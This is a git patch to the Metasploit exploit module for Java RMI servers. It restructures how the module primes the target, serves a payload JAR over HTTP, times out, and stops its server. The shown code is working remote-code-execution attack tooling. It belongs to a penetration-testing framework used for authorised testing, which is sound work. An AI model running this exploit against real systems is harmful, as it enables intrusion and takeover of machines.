From 73ce4cbeaa60e71e9bc63476cfab2c19306de49e Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 13 Nov 2014 18:21:19 -0600
Subject: [PATCH] Use primer

---
 .../exploits/multi/misc/java_rmi_server.rb    | 35 ++++++++++++-------
 1 file changed, 23 insertions(+), 12 deletions(-)

diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb
index 3180875a4d..7fdeb2f2ea 100644
--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -8,8 +8,8 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpServer
   include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpServer
 
   def initialize(info = {})
     super(update_info(info,
@@ -41,6 +41,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'Payload'        => { 'BadChars' => '', 'DisableNops' => true },
       'Stance'         => Msf::Exploit::Stance::Aggressive,
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 10
+        },
       'Targets'        =>
         [
           [ 'Generic (Java Payload)',
@@ -76,14 +80,26 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DefaultTarget'  => 0
     ))
-    register_options( [ Opt::RPORT(1099) ], self.class)
+    register_options([
+      Opt::RPORT(1099),
+      OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
+    ], self.class)
 
     register_autofilter_ports([ 1098, 1099 ])
     register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry })
   end
 
   def exploit
-    start_service()
+    begin
+      Timeout.timeout(datastore['HTTPDELAY']) { super }
+    rescue Timeout::Error
+      # When the server stops due to our timeout, fail and
+      # don't wait WfsDelay
+      fail_with(Failure::Unknown, "The HTTP Server didn't get a payload requests")
+    end
+  end
+
+  def primer
     connect
 
     jar = rand_text_alpha(rand(8)+1) + '.jar'
@@ -106,11 +122,13 @@ class Metasploit3 < Msf::Exploit::Remote
     buf = ""
     1.upto(6) do
       res = sock.get_once(-1, 5) rescue nil
-      break if not res
+      break unless res
       break if session_created?
       buf << res
     end
 
+    disconnect
+
     if buf =~ /RMI class loader disabled/
       fail_with(Failure::NotVulnerable, "The RMI class loader is disabled")
     end
@@ -120,14 +138,6 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     print_good("Target #{rhost}:#{rport} may be exploitable...")
-
-    # Wait for the request to be handled
-    1.upto(120) do
-      break if session_created?
-      select(nil, nil, nil, 0.25)
-      handler()
-    end
-
   end
 
   def on_request_uri(cli, request)
@@ -148,6 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
       })
 
       print_status("Replied to request for payload JAR")
+      stop_service
     end
   end